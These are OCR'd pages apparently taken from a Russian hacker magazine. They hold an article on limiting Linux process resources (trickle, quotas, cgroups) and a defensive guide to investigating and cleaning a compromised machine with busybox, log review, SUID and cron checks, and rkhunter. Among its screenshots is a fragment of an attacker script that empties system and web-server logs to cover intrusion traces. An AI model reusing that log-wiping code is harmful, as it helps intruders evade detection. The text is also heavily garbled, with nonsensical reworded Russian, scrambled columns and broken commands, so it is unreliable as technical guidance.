ksoftiгqd/8

б гооt

RT

В

В

В

В

В.В

В : ВВ.ВВ migгation / B

В

-20

В

В

В

В

В.В

В:ВВ.ВВ

гооt

В -2В

В

В

В

В

В.В

В : ВВ . ВВ khelpeг

гооt гооt

В

-213

00

В

·В В

В е

В В

0 S 5 5 S

0

гооt

В В

В.В В.В

В : ВВ.ВВ netns В : ВБ . ВВ sync_supeгs

03 14 15 16

томишко случае, если бы ни по части дн об другое п риложе ни ене со д е ла е т э в таком случае . Э т что касается

061814Bk

Э гооt

0

сяк этому классу, п олуча т шанс работы от ди ском толь ко на

042624k used ,

U*IIMIIjM•)S.WII•4WMQI•il:llj-iljliMH 28 В 125m 09m 0312 S 14 0.8 048:11.16 npviewer.bln

047 гооt 18013 jlm 6444 j 0m 3148В j1m 31526 j1m 121513 гооt 12396 jlm 17834 j1m 31430 jlm 31516 jlm 1 гооt

0. ldle. Приложения, имеющие п риоритет ввода-вывода, отн осящий­

шении различных хладнокровно т екущих, однако д ол г в отношении работающих проце ссов,

0952764k total ,

08034 jlm

приоритетына три класса:

самый коротенький группировка приоритетов, е го покойно эксплуатнуть во отно­

load average: 0.27 , 0.11 . 0.08 8 stopped, б zoJТt>ie

Cpu(s): 0.0%us , З.?'Zsy, B.Bini , BS.S:~id , l.B'Xwa, B. B:Z.hi , B.B%si , B.B%st Hem : 20591BBk total, 0968876k used, 9HI24k: fгее, lllБBk buffers

cpuset

И сие около том, что такое? ни одного флеw-баннера во брауэере невыгодный с открытым забралом

которые могут п что касается дожд а ть . В сие м для л ассе поглощать общей сложности одно з нач ение при оритета -0 .

0. Best effort. Класс пр иори т е тов, используемый с целью всех процессов по умолча ни ю. Запросы ввода-вывода прил оже ний со рядом оритетом

Flle

Edlt

View Help

Resources

Conlrol Groups

сего класса обс л ужив ают ся за очере д и, хотя первыми получают

Proceuor Home

прав что до для работу ди ском п роцессы от ибо л ее ваша милость соким приорит е -

Groups

том, тот или другой может совмещать значе ни е ото О впредь до 0 00- лично ый высокий приоритет, 0 - самый н изкий]. П ри этом учитывается т акже равно стан­ дартный приоритет, следовать д фактически ны й командой пiсе, приближенно который прил ожения, запу щ енные не без; через «п iсе -п

09 Ыа-Ыа-Ыа>>,

буд ут последними

> ProcessorSМru

ffrкtiveProcessorAIIocatlon

Ssl'tarts

0S,.ormore

!!!а Memory

О Dlskl/0

~~

Network

в всехочере д ях всех планировщиков.

0. Real t ime. Приоритеты реального времени, п ри ло а ния вместе с возле ори ­ т етом сего класса буд ут во всякое время равным образом умереть и никак не встать всех ситуациях секс у чать д оступ ко диску п ервыми. Восемьдоступных уро вн ей приоритетое

I0 -7] тогда используются с целью указания длит е л ьнос ти времени, отведе нн ого н а ввод-вывод. Е сли во системе вкушать небольшую толику про­ цессов не без; таким приоритетом, они будут обс л ужива ть ся объединение очере ди . За каж суета изо трех классов подле что до ри тетое закреплен ном е р:

0 - геаl

time, 0- best-effoгt, 0 - idle. Ч тоб ы запус тить присовокупление со каким­ либо приоритетом ввода-вывода, сле ветрено отдать его равно м ваш покорный слуга в качестве кого

Vlrcu.IIM•chlnes

V Processor lnfo

ssrwes

SsuЬJroups;34processes

Processor lllt: Jntei(R)Corf(ТMJ2Duo

CPU L7SOO 0

0 .бOGHz

Procfsses lnthltsroup: • •

/uir/Ьinlmysqld_safe

lntei!R)Corf{ТMJ2Duo

CPU L7500 Hz

0

db.qUWf

postarн

• •

/uir/Ьinlpepool

Processor•2:

tusrlliЬtxec/mysqkl

.'""'

ora_disp~~lch

SO..ormorf ()

(10ShlfH}

AttuaiProcess.orusa&t: Avera&e 01.8'tlo (Ovfr 0М ,nst24 hours}

Hl&h

O'lto

Low

~

параметр коман ды ioпice, указав стриптиз класса приоритетаи н омер приоритета во качестве опций. Нап ример:

016

nрототип графического интерфейса управления cgгoups во Fedoгa

ХАКЕР

01/154/2011


Победа на войне следовать репертуар

> ps aux

0 gгер npvieweг

j1m j1m

02303

0 . 0 0.0 9~92 9~8 pts/2 S+ 21 :55 0 :00 gгер npvieweг 15 .8 0.9 02820~ 00116 0 51 Sep0~ 0~7:33 /usг/liЬ/nspluginwгappeг/i386/li nux/npvieweг.bin --plugin /usг/lib32/mozilla/plugins/libflashplayeг.so --connection /огg/wгаррег/ 1803~

NSPlugins / libflashplayeг.so/18013-2/180~289383

>1

С через аляповатый для оманды не возбраняется выяснить, зачем npviewer. Ьin- сие Flash-плeep

В качестве домашне г касательно каталога указываем собственный частный ка т а­ лог. Пароль оставляем пус т ым.

ложений, ведь мож н что до обратиться tгiсklе-демоном . Н ужно просто за п устить демон, указав нужные скорости:

0. Устанавливаемдля пользователядисковую квоту объемом 000 Г б:

$ trickled -d 028 -u 028

$ sudo apt-get $ su

iпstall

quota И вслед п ускай нужные приложения ранее сверх указания скорост и:

# init 0 Открываем обложка /etc/fstab, находим раздел, содержа суп й ка т алог

/ home, да добавляем ко нему опцию usгquota: /dev/sda7 / home ext4 defaults,usrquota

е

$ trickle wget ftp ~/ kernel .o rg/ Ьla-Ьla-Ыa $ trickle transmission $ trickle chromium Те п ерь вс е три приложения п олуча т водная магистраль шириной 028 кб/с.

0

После сего перемонтируем раздел /home да инициализируем

ГР У П П ИР У ЕМСЯ

орудие управления квотами:

Все выш е рассмотренные методы, так например равно капелька извращенные, хоро­

# mount -о remount / home # quotacheck -cugm / home

телям Liпux, которые безграмотный собираются на ближайшее срок обмениваться его сверху

ши тем, чт по части работают чуть было не на любом юниксе. Однако пользова­ что-то другое, моя персона бы рекомендовал согласно вкруг себя взирать очами во сторо н у cgгoups. Сопtгоl Gгoups- сие подсистема L i пu х-я дра , позволяющая объеди­

Запускаем следующую команду, в надежде зада ть квоту поль зовате­ лю

quota_1 OOgb:

нять безвыгодный сколь процессов равно их потомков во группы, для того каждой из которых могут быть налицо домашние ограничения н а д оступ для ресурсам

зрелище ци что до нн ой системы . Изначально п относительно дсистема была разработана интересах

# ЕDПОR=любимы й_редактор edquota -u quota_1eegb

работы на связке со системой виртуализации уровня ОС, а может фигурировать без каких -либо по части гран иче ний использована равно равно как единичный механизм.

Откроется вычитчик вместе с таблицей, похожей в со д ержимое файла

У пр ав лени е подсистемой cgгoups происходит вследствие файлы одно­

/etc/ fstab. В колонке haгd указываем размер квоты на килобайтах,

именной виртуальной файловой сис темы, однако к туалет не грех ис­

в надежде подытожить правильное значение, интересах сего позволяется ис­

пользовать да побольше высокоуровневые инструменты , такие наравне дворовик

пользовать следующую неподвижность нд у !если тост отлично об 000 Гб]: echo

cgcoп f ig, читающий обложка /etc/cgcoпfig.co п f п ри старте равно автоматиче­

$( (100*1024*1024) ) .

ски соз д ающий г отовую ко использованию иерархию групп равно закре­

Сохраняем файл, выходим с однопользовательского режима:

пленных следовать ней ограничений, cgcгeate, д обавляющую новые группы, и

cgexec,

п озволяющую привя следовать ть однозначный движение для т ой или — или

равно да й гр у пп е. Эти инструменты распространяются во составе шаг кета

# init 0 # exit

сgгоuр -Ьi п, таково что такое? е г об нельзя не усик т а н обвить во первую очередь.

0. Запускаем приложениесограничением:

монтирования, на качестве которой большей частью используется указатель 0

Далее со л е ветрено подсоединить файловую систему cgгoup ко точке

mпt/cgгoups:

$ sudo -u quota_1eegb transmission $ sudo mkdir / mnt / cgroups $ sudo mount -t cgroup nопе / mnt /cg roups

БЕЗДОННАЯ СЕТЬ Управлять пропускной вместе с п особностью канала про поверстно взятых пр и­

Туда а подобает отвести виртуальные файловые системы

ложений допускается не без; через у тили твоя милость tгickle, котик орая, по образу равно описанная

дотоле экипаж

cpul imit, п росто приостанавливает передач у данных

через приложен равно аз многогрешный равным образом ко н ему на случае превышения указанного лимитень !это

нужных п одсистем, ко т орые на правах однажды да отвечают вслед граница

ресурсов . Всего таких подсистем сущес т вует девять:

делается от через подложной функции socket] . Утилита питаться на пакетах ради любого дистрибутива, того установи ть

cgroups

Подсистемы

ее просто:

Ыkio

$ sudo apt-get install trickle

cpu - ограниченность использования процессора; cpuacct - собирает статистику использования процессора; cpuset - прикрепление процессов одной группы ко конкретному;

Далее дозволено запусти ть л юбое п риложе ни е из огран ич ением:

$ trickle -d 028 -u 028 \ wget

ftp ~// kerпel.org/Ьla-Ыa-Ыa

Здесь оп ц ия

'-d'

задает натиск загрузки,

ядру

• • • ' - u'

- скорос ть

-

лимиты сверху пропускную дар ввода-вывода;

процессора;

devices f ceezer memory net_cls -

орган доступом для устройствам; заморозка равным образом разморозка процессов ~ ограничения в использования оперативной памяти; помечает сетевые пакеты процессов

идентификатором класса

(classid)

с целью будущий

скачивания !оба во килобайтах во секун д у ! . Е сли снедать п отребность на

настройки ограничения пропускной пар вместе с через

выделении одинаковой шир ины канала не без; ра зу к нескольких при-

подсистемы

ХАКЕР

01/154/2011

Traffic Control (tc);

017


UNIXOID ns -

правление

пространствами

Но автор ограничимся тремя изо них: Ыkio ,

net_cls в свою очередь

Запустим tгansmissioп, привязав его для указанной группе:

имен.

cpu

равным образом memoгy. Подсистема

тельно ради необходимости с ручным управлением настройки шейпинга вместе с помощью утилиты

tc,

$ cgexec -g Ыkio:me/transmission transmission

может существовать полезна, хотя пускать в ход ее затрудни­

сколько неграмотный всего лишь шибко неудобно, же равным образом несложно упрощенно получи и распишись

Также создадим отдельную группу пользу кого Flаsh-плагина, жрущего память равно процессор:

фоне существования простого на использовании шейпера tгickle.

Итак , с намерением отвести подсистемы, нужно открываем обложка

cgcondig.conf

/etc/

$ cgcreate -g cpu,memory:me/npviewer

равно добавляем на него следующие строки:

Ограничим его

$ sudo vi /etc/cgconfig.conf

00241

mount { cpu=/mnt/cgroups/cpu; memory=/mnt/cgroups/memory; Ыkio

000 Мб памяти равным образом 00% (доступные значения ото 0 прежде

процессарного времени:

$ echo 088 > /mnt/cgroups/cpu/me/npviewer/cpu.shares $ echo 000м > \ /mnt/cgroups/memory/me/npviewer/memory.limit_in_bytes

=/mnt/cgroups/Ьlkio;

На нынешний крата добавим во группу еще впахивающий процесс: Закрываем обложка да nерезапускаем услуга

cgconfig: $ cgclassify -g memory,cpu:me/пpviewer \ " pidof npviewer.bin ·

$ sudo /etc/init.d/cgconfig Все, пока что во каталогах /mnt/cgгoups/cpu, /mnt/cgгoups/memoгy да

Чтобы невыгодный инъекцировать совершенно сии зубодробительные команды со временем каж­

/mnt/cgгoups/Ыkio позволительно строить новые группы процессов, огра­

дой загрузки машины, их дозволено сделать в долг на конфигурационный обложка

ничиваемых одноименной подсистемой.

/etc/cgconfi g.confi g:

Проблема всего во том, почто чтобы заnиси сии каталоги доступны только пользователю гооt . Выйти изо этой ситуации не возбраняется создав новую группу с целью самого себя из через команды cgcгeate:

$ sudo cgcreate

$USER -g

Это распоряжение создаст синопсис

cpu,memory,Ыkio:me

me

во каталогах

cpu,

memoгy равно

Ыkio, удобопонятный на заnиси равно чтения текущим пользователем.

# vi /etc/cgconfig.conf # Группа про пользователя group me { perm { # Кто может править лимитами? admin uid=UID_пользователя

В эту метагрупnу позволяется водворить нужные процессы равным образом настро­

# Кто может надбавлять процессы task { uid=UID_пользователя

ить ограничения, однако вернее на каждого nриложения образовать

собственную группу . Создадим, наnример, группу в целях приложения tгansmission, которая короче срезать его преимущество ввода­

во группу?

вывода:

$ cgcreate -g

Ыkio:me/transmission

Изменим первое место (так называемый вес] ввода-вывода чтобы этой групnы впредь до минимума (возможные значения с 000 давно 0000]:

$ echo 000 > /mnt/cgroups/Ьlkio/me/transmission/bklio.weight

> ulimit -а (Ьlocks, -с) 0 core file size data seg size Ckbytes, -d) unlimited С-е) 00 scheduling priority file size CЫocks, -f) unlimited ( -i) 05058 pending signals max locked memory Ckbytes, -1) 00000 max memory size Ckbytes, -m) unlimited open files C-n) 0024 pipe size (512 bytes, -р) 0 POSIX message queues Cbytes, -q) 019200 real-time priority С-г) 05 stack size (kbytes, -s) 0192 cpu time (seconds, -t) unlimited (-u) 06058 max user processes (kbytes, -v) unlimited virtual memory (-х) unlimited file locks >1

# К каким подсистемам cpu { } memory { } Ыkio { }

привязана каста

группа?

group me/npviewer cpu { cpu.shares=188 ; memory { memory.limit_in_bytes

group

me/traпsmission

Ыkio

000м ;

{

{

Ыkio.weight=

088;

}

Все, останется токмо привязать процессы ко нужной группе .

I:I§I:I•I!W Ограничивать приложения во ресурсах далеко не только лишь можно, только и нужно. Ограничения помогают нанести поражение тормоза системы, по­ ставить получи поляна прожорливые программы, предпринять инет

быстрым ажно вот сезон работы

wget.

И всегда сие не без; через про­

стых однострочных команд да конфигурационных файлов во пару строк. :Х:

С через

018

ulimit не запрещается править малограмотный лишь только лимитом нате видеопамять

ХАКЕР

01 / 054/2 011


UNIXOID

Гена Зобнин lexecЬit.rul

Зализываем раны ПОДРОБНОЕ HOW ТО О ТОМ, ЧТО СЛЕДУЕТ ДЕЛАТЬ СРАЗУ ПОСЛЕ ВЗЛОМА МАШИНЫ

брезгуют ничем: ни серверами,

-

ни домашними компами,

выбирай файловую

ни хоть роутерами. Любая

систему Ыrfs в качестве основной,

Никто изо нас далеко не застрахован от взлома. Кул-хацкеры невыгодный

СРАЗУ ПОСЛЕ

При следующей

полной

компутер [а он, известно же, отнюдь не выключается сутками напролет). откры­

переустановке

ваешь браузер равным образом замечаешь какие-то странные притормаживания ,

дистрибутива

возлюбленная невыгодный всего лишь

машина, подключенная для

Сети, может поделаться мишенью . Чтобы охранить себя, следует укреплять оборону из через

быстрее

ext4,

только равно позволяет откатывать

файловую систему к предыдущим

состояниям.

ась? делать, разве взламывание все­

таки произошел? Как найти виновника равным образом отбелить систему

с подсунутых им бэкдоров?

ХАКЕР

01/154/2011

которых обыкновенно ввек никак не было равно являться безграмотный может. Чтобы узнать. на

нежели дело, твоя милость запускаешь дисплей недотка кажется iptгaf/gkгellm да видишь небольшие, так постоянные прибыль трафика на сторону какого-то не­ знакомого

IP, ага единаче равно со странного порта чаятельно 03477 сиречь аж SSH.

В голове махом пробегает помысел насчёт взломе, ру ки начинают метаться по клавиатуре, так цели дерьмовый далеко не пр еследую т. Это шаг ника, а отнюдь не осо ­ знан ны е действия. Чт в рассуждении в эту пору делать?

В первую караван не без; л е задувает удалить сетной шн ур с комок п а [или отключить точку д оступа, ежели равным образом никак не т однажды ну да ется до WiFi) . Можно, ко­

брандмауэра равно надзирать за обновлениями софта, тем не менее

Ты возвращаешься домой, наливаешь себя чашку кофе, садишься вслед

нечно, отключить равно несть посредством графичный интерфейс alias неподвижность ндой Разрешенный гооt­

лоrин посредством SSH или необновленный накануне FТР­ сервер- основные

вроде << ifcoпfig

ethO dowп », только сие займет хлеще времени, ко т орое

возбраняется терять. Следует запомнить, что-нибудь прежде выяснения всех све д ений о взломщике ни на коем случае не позволяется перезагружать машину тож

спускать на тормозах сетевые сер висы. Во-первых. вора долженствует сыскивать п об

причины взлома

горячим следам, во-вторых, последняя чулочная игла в колеснице неграмотный знает, много симпатия засунул бэкдор, на

*niх-систем .

стартовые скрипты alias во бинарник сетевого сервиса. Далее необходимо запастись чистыми деньгами инструментами администри­ рования. Больше системе надеяться нельзя, любая ма л о-мальски

019


UNIXOID ПО ГОРЯЧИМ СЛЕДАМ

> less

lvar/log/outh . log Jul 09 02 :34 :50 localhмt sshdl238791: Fail ed

pesswoгd

for invelld user ts fr011

01Э . 095.б5.7б

por

t 07282 ssh2 Jul 09 02 :34 :58 locelhost sshdi21B771 : Pl\ll_unlx_sesslon(sshd :sesslon) : sesslon c losed for

us eг го

ot Jul 09 02 :5«1 : 09 \oce l host sshdl 052б61: rev eгse mopplng checklng geteddгinfo fог c:tel-78-157-22- 01!1 . coЫetel . com.lllk: (78 . 057 .22 .141 fe i led - POSS I ВlE B~Ef.H H Rffitf!T! Jul 09 02 :54 :21 loce l host sshdl 052ббl: Accepted posswoгd for root rгom 08. 057.22. 041 por t 04887 ss h2 Jul 09 02 :54:21 loco l host sshd[ 05 06БJ: Plllll...unlx_sesslon( sshd :sesslonJ: ses slon opened for user го

ot

Ьу

Jul 09 03 :15 :52 locothost sudo : r oot : ТТУ=рts /8 ; Pl-0=/root ; USER=root ; COI't'ЯНO=/usr /Ьin / p ept Jul 09 ВЭ : 05 :52 tocolhost sudo : poll_un i xlsudo :sesston J: sesslon opened for user r oot Ьу r ootculd=

&CIW'I

Jul 09 Jul 09

цессах, текущих сетевых соединениях !даже впоследствии выдергивания кабеля строй довольно некоторое времена иметь соединения откры­

тыми], открытых портах равно всем, почто пишущий сии строки потеряем позже перезагрузки, в файлы сверху карте памяти:

{uid=BJ

Jul 09 02 :59 : 05 locelho5 t sudo : гоо t : ПY=pts/8 ; PI-C=Iгoot ; USER=гoo t ; ~НO=/usr /Ыn/p ocmon -Syy Jul 09 02 :59 : 05 locelhost sudo : P<'ll_unix(sudo :sesslonJ : sesslon орепеd for user r oot Ьу r ootculd=

., .,

Первое, в чем дело? нужно сделать,- сие сберечь совершенно разъяснение по части про­

ВЭ : IБ : I В ВЭ : 05 : 0б

. ceЫetel . con . 01k

locelhos t pesswdt21Б77J : pм_uni~Cip&sswd : chllllthtolcJ : pм!IIIOI"'d ch&nged for root locelhost sshi:HЭ2398] : reverse мpplng checlctng get&ddr'lnfo for ctel-78- 057- 02- 04 [ 08 . 057 .22 . 04] folled

Та для выглядит /va г/log/auth . log затем входа в соответствии с SSH соответственно сторонне го поль зователя

# # # # # # #

D=/ media/usbfl ash busybox ps > $D/ps.txt busybox net stat - tuw > $D/conn . txt busybox netstat - tuwl \ grep LISTEN > $D/listen. txt busybox who > $D/users.txt busybox lsmod > $D/modules.txt busybox mount > $D/mount . txt Теперь у нас убирать ряд файлов, которые хранят показания

(!ll i f [ "$1"=="--cleaгlogs" J; then echo "[• JCleaгning Logs ... " echo "------------------------------------" #Cleaгs 02 Diffeгent Logs Ыanklog< 0 < i f [ -f $<1 J J; then echo echo "--[•JCleaгed $(1)" echo > $<11 i f [ -f $<1 J . 0 J ; then echo "--[•JCleaгed $<11 Backup" echo "" > $(1} . 0 fi fi Ыank

log

в отношении текущем состоянии системы. В файле

подозрительных приложений, которых во системе оказываться отнюдь не должно.

Немногие кул-хацкеры обременяют себя какой-либо маскировкой своих процессов, вследствие чего во списке твоя милость можешь разыскать названия известных руткитов alias даже если команд подобно пс или например

cups,

хоть бы твоя милость самовольно удалил его единаче бадняк назад- со большущий

пользователя работает стервис !если сие отнюдь не гооt], равным образом раскопать целое его файлы из через следующей команды:

J

-user

ЮЗЕР

Скорее сумме твоя милость увидишь исходники бэкдора другими словами бота равным образом остальные

Ыanklog /vaг!log/httpd/access_log Ыanklog /vaг / log/httpd/access.log Ыanklog /vaг/log/httpd/eггoг _log Ыanklog / vaг/log/httpd /eггoг

Также во

вероятностью сие бэкдор. Тогда нужно посмотреть, справами какого

# busybox fi nd

Ыanklog /vaг/log/messages

telnet.

списке могут взяться имена сервисов, несвойственных твоей системе,

/ vаг !log/last log

Ыanklog / vaг/log / syslog Ыanklog /vaг / log/syslog

ps.txt перечислены безвыездно

активные процессы. Его долженствует бережливо ознакомиться получи и распишись любимец

подгребки деятельности взломщика . Вполне возможно, в чем дело? на списке процессов твоя милость вместе неграмотный увидишь синь порох подозрительного, да сие

.log

ничуть отнюдь не значит, зачем отверточник малограмотный оставил бэкдора, как ми видится его скрывает особенный устройство ядра . Как его найти, твоя милость узнаешь на

Да ж е са м ы й безыскусственный Liпuх-руткит у м еет выскоблить логи

следующем разделе.

В файле

conn.txt будут перечислены безвыездно сетевые соединения . Здесь

что поделаешь стремлять во сторону nодозрительных IР-адресов удаленной полезная обслуживающая программа может бытовать изменена: бэкдора, подсунутого хацкером, цессов,

ls может утаивать файлы ps- вычеркивать их изо списка про­

lsmod- неграмотный получать информацию что касается подозрительных моду­

стороны равно номеров портов. Вполне возможно, вор использовал « активныЙ >> бэкдор, кто своевольно подключается ко машине злоумыш­

ленника, заместо того ради дожидаться соединения . В любом случае,

лях. Нам нужны новые, бесспорно «чистые >>, инструменты. Все они

инвентарь никуда не денешься разобрать по косточкам адски тщательно, что твоя милость

вкушать во танцевальный шаг кете

найдешь IР-адрес подлеца??. Файл

busybox, его версию ради своего дистрибутива дозволительно

listen.txt- сие каталог открытых

скачать используя другую машину !п одойдет смартфон, планшет,

портов . Твоя назначение -узнать, экой услуга скрыт после тем другими словами иным но­

нетбук], наложить получи фле ш ку да установить:

мером, равно выяснить, является ли возлюбленный легальным !например, может быть открыт речные ворота 00, а wеЬ-сервера получи твоей машине в жизнь не неграмотный было]. Файл useгs . txt- оглавление текущих пользователей. Здесь однако нужно

# dpkg -i busybox-*

фигурировать ясно: какой угодно неважнецкий пользователь-твой враг, больше детальную Или сконцентрировать беспричинно с исходников:

ан фи что до нем ты да я узнаем нате следующем этапе разбирательства. Файл

modules.txt- прейскурант загруженных модулей , смотрим, анализируем, га­ # # # #

даем, может ли оный другими словами разный узел присутствовать загружен получи и распишись нашей машине .

wget http : //goo.gl/ TuWTE tar -xjf busybox- 0 .19.1.tar.bz2 cd busybox-1.19.1 make menuconfig

01

просто-напросто выходим с

Файл

mount.txt- примонтированные файловые системы, многие

взломщики используюттрюки вместе с перемонтированием для того подсовыва­

ния левых файлов, сокрытия своих действий или — или подмены файлов.

конфигуратора

Этот разбирание достаточно обитать сообразно потенциал капелька позже, а не долго думая самое миг прогнать самочерного меж белоножкиным во допрос какой-либо

# make # make i nsta l l

LiveCD равно

сорвать машину !сбросить кнопкой, а никак не чрез разблюдовка сиречь команду геЬооt- на правах ваш покорнейший слуга сейчас говорил, скриптам инициализации/шатдауна до­

Также подойдет модификация из рот н овкой движение кета

busybox для другую

верять нельзя].

машину со последующим копированием бинарника /Ьin/busybox !этот вариант аж предпочтительнее, главное, дай тебе ОС равным образом процессорная

структура машин совпадали]. Свежеустановленный busybox дол­

ЧТО ПРОИЗОШЛО? После перезагрузки равно входа на

LiveCD делаем следующее:

жен обеспечивать «чистые » версии всех необходимых нам администра­

тивных утилит, все равным образом ему невозможно открыться возьми

000%:

наиболее извра­

щенные взломщики могут занять место равным образом равно устанавливатель танцевальный шаг кетов, равным образом

утилиту

дозволительно разнюхать с уже сохраненного файла mount.txt]:

wget, равным образом инда ер, однако сие сейчас абсолютно сюрреалистический случай,

равно дьявол маловероятен. Теперь позволительно ударить для исследованию.

020

0. Проверяем всё-таки файловые системы нашей механизмы !имена разделов

# e2fsck_jdev/sda{ 0,2,3,4}

ХАКЕР

01/154/2011


Зализываем раны

/etc/passwd [точнее, /mпt/etc/passwdl для дисциплина nользователей с нулевым UID:

SSHERIFF

# busybox cat /etc/passwd

0

grep '. * :. *: е:'

Воттак допускается допустить гооt-логин всего из доверенных хостов: Если нашлось сильнее одной записи, зна чит, вор успел за­

# vi /etc/ssh/sshd_config

организовывать дополнительного суперпользователя. Найди его домоделанный

PermitRootLogin no Match Host 092.168.1.*,127.e.e.l PermitRootlogin yes

тех но странных файлов равным образом подкаталогов. Часто, так чтобы невыгодный палить­

кадастр [предпоследнее поле! да изучи начинка на поиска х все ся, взломщики далеко не трогают юзерские учетные календарь да безграмотный меняют

шаг роли, а легко добавляют принадлежащий родничок во обложка -/.ssh/authoгized_keys какого-либо пользователя. Стоит проэкзаменовать настоящий обложка в существо

левых ключей [обычно вслед за тем кушать только лишь единовластно официальный ключ, кото­

0. Монтируем корневую файловую систему ко каталогу /mnt [опять же консультируемся не без; mount.txtl:

рый твоя милость самовластно тама добавил, либо файла невыгодный существует вовсе!. Еще до некоторой степени любимых методов оставления бэкдора бери скорую руку:

# mount /dev/sdaX /mnt

0.

UID-бит получай файлы, пересмотр для которые делается из через пре­ словутого fiпd:

0. Таким но образом монтируем постоянно другие разделы на соответ­ ствии из mount.txt.

# busybox find

0. На любой событие копируем на /mnt/Ьin busybox вместе с LiveCD [если, конеч­

Правда, тута нужно знать, какие файлы могутиметь SUID-бит, а какие

но, получай диске спирт есть!:

0 \( -perm

-е2еее -о

-perm -е4еее \)

нет. Но зто усилий выяснить, выйдя изо сhгооt-окружения, выполнив

ту но команду во отношении файлов

ер

#

/bin/busybox /mnt/bin/busybox

LiveCD равным образом сравнив листинги. 2. Сетевой обслуживание xinetd, на тот или другой хацкер был в силах присыпать свой собственный сервис. Следует пропускать равным образом разобрать

0. Делаем индекс /mпt корневой файловой системой не без; через

предмет файлов каталога /etc/xiпetd.d, а в свой черед обложка /etc/iпetd.

conf. Кстати, самовольно ясный путь наличия сего файла во системеуже что до многом

chгoot:

говорит. Современные дистрибутивы читают его, же уж издревле отнюдь не

# chroot /mnt /bin/bash

используют.

0. Механизм подключаемы х модулей аутентификации РАМ . Взлом­ Теперь автор сих строк оказываемся на своей системе, да не без; безоговорочно «чисты­

ми >>

busybox равно ядром . Это значит, что такое? никакие методы сокрытия фай­

щик был в состоянии подпихнуть во систему особый являющийся личной собственностью часть аутентифи­ кации,которыйпускаето пределенныхпользователейбезспроса.

улов равно какой-либо деятельности взломщика днесь неграмотный работают. Что

Анализируем файлы каталога /etc/pam.d, обращаем интерес бери

готовить дальше? Во-первых, годится проэкзаменовать каталоги /гооt, принадлежащий

третью колонку, в дальнейшем перечислены имена задействованных модулей

свой каталог, а тоже /tmp, /vaг/tmp равно /dev/shm получай тема на­

аутентификации. Вбиваем каждое изо них во

личия странных файлов равно подкаталогов. Это могут фигурировать исполняемые

получи и распишись легальность. Но необходимо помнить, в чем дело? хакер могхакнуть равным образом

файлы из именами системных утилит, единичные файлы исходников с расширением 'с' либо целые каталоги вместе с исходниками. Все зто может

Google равно проверяем

озагсенный устройство .

0. Некоторые недальновидные огурцы умудряются писать домашние

остаться задним числом взломщика, когда спирт безвыгодный успел, отнюдь не хотел , либо оказал­

команды во не без; гоп. Там, например, может взяться бзкдор, открывающий

ся больно глуп, воеже уписать ради с лица . Обрати не заговаривать зубы сверху

определительный морские ворота нате

скрытые файлы, начинающиеся от точки, равным образом имена вроде« ______ >>,

портбудет закрыт, равным образом админ, полагающийся в данные

по большей части злоумышленники пытаются сохранить в тайне домашние файлы .

alias

Далее нужно пропускать по сию пору файлы .bas h _ histoгy с домашних каталогов активных пользователей , в корне возможно, хацкер забыл

их стереть, равным образом твоя милость увидишь меню вводимых им команд [вперемешку со своими, конечно!. Не лишним склифосовский подвергнуть проверке начинка файла

0 минуты каждые ше сть часов. В 09% случаев netstat

nmap, далеко не заметит нисколько необычного. Но полно пробежаться

по мнению файла м каталогов /etc/cгon. •, а та для а /vaг/spool/cгoп/cгontabs, и всестанет ясно.

0. СGI-скрипты. Не одиночно взломщики помещаютзакладки неграмотный во приложе­ ния самой операционной системы, а во разные сценарии, исполь­

зуемые wеЬ-сервером чтобы динамической генерации ответов. Обычно зто случается, в некоторых случаях хацкер ломаетсервер чрез просвет на одном с

> cd / raat uпame

&&

cat

. bash_histaгy

-~

apt-get update yum fгее -m cat /etc / •-release i fconfig pacman -Rdd zope-interface sudo pacman -Syy sudo apt

таких скриптов, же отнюдь не можетповыситьсвои карт-бланш на системе . Тогда ему не остается нуль другого, как бы правитьскрипты wеЬ-сервера, по­

мещая на нихбзкдор [именно поэтому, кстати, не без; таких скриптое следует сниматьбитзаписи для того всех пользователей, выключая гootl. К сожалению, всё-таки сии проверки ни для чему отнюдь не около ведут, если модифицированными оказались системные утилиты равно сервисы.

wget suda apt i tude update apt-get install sniffles - alsa installs libsniffle , libsniffle-dev suda apt-get install gгub-pc --гeinstall

sudo

растаn

apt

w passwd

+wget http: // 0inux .duke . edu / pгajects / yum / dawnlaad / 0 . B/ yum-2. В . 0 . tar . gz tаг -xvzf yum-2 . В , 0 . tar . gz cd yum-2 .B.7 ./ canfiguгe

make

Иногда взломщики изменяют расширенные атрибуты измененных

файлов не без; целью воспретить их изменение. Чтобы отвоевать по сию пору нате свои места, порядочно облечь в тело и кровь следующую команду:

скрипт-кидди без затей умиляют своей наивностью

ХАКЕР

ИЗМЕНЕНИЕ АТРИБУТОВ ФАЙЛОВ

01 /154/2011

# chattr -iacsuASDd {/,/usr,/usr/local}{/bin/,/sbin/}*

021


UNIXOID Взломщик может просто-напросто пересобрать

vsftpd вместе с бэкдором вну-

три, найти его держи простор оригинала, подмести после собою равным образом

ровно уйти.

09% пользователей даже если малограмотный заметят сего равно будут

считать, ась? от их системами однако во nолном порядке. Для выявления подобных бэкдоров существуют специальные утилиты. Инстру­ мент гkhunteг- одна с лучших программ такого класса, возлюбленная

способна откопать квалифицированная известных типов руткитов, умеет ска нировать безграмотный всего лишь обычные приложения, хотя равным образом модули ядра,

> last root raot jlm j 0m

pts/3 pts/2 tty1 tty1

0В .157. 02.14 78 . 057 . 02 .14

геЬооt

system boat

0.6.39-ARCH

j1m jlm

tty1 tty1

reboot

system boot

jlm

tty1 tty1

j lm reboot

достоинство ко всему симпатия проводит аудирование безопасности да показывает

геЬооt

nотенциально уязвимые для взлому сетевые сер висы. Использовать

reboot

ее просто, хватит за глаза ввести набор от приложением (можешь смело подсаживаться ко интернету из LiveCD, сие безопасно!:

# apt-get install rkhunter

геЬооt геЬооt

reboot reboot reboot reboat reboot reboot reboot

Thu Jul 01 01 З9- 01:49 088:89) Thu Ju 0 01 01 07 gone - до logout

0.6.39-ARCH

system sys tem system system system system system system

boot boot boat boot boot boot boot boot

0.6.39-ARCH 2, б. 09-ARCH 2.6.39-ARCH 2.6.39-ARCH 2.6.39-ARCH 2. Б. 09-ARCH 2. б. 09-ARCH 2. Б. 07-ARCH

system system system system

boot boot boot boot

0. б. 07-Aii!CH 2. Б. 07-ARCH 2. Б. 07-ARCH 2. Б. 07-ARCH

Тhu

Jul 01 08

Thu Thu Thu Thu Thu

Jul Jul Jul Jul Jul

В?

st i 01 logged in

01 0В 07 - 08:87 21 0В 07 - 03:27 21 08 03 - cгash 21 08 03 - 08:8З 21 0В 03 - 03:27

088:881 185 :281 188:841 188 :88 0 185:241

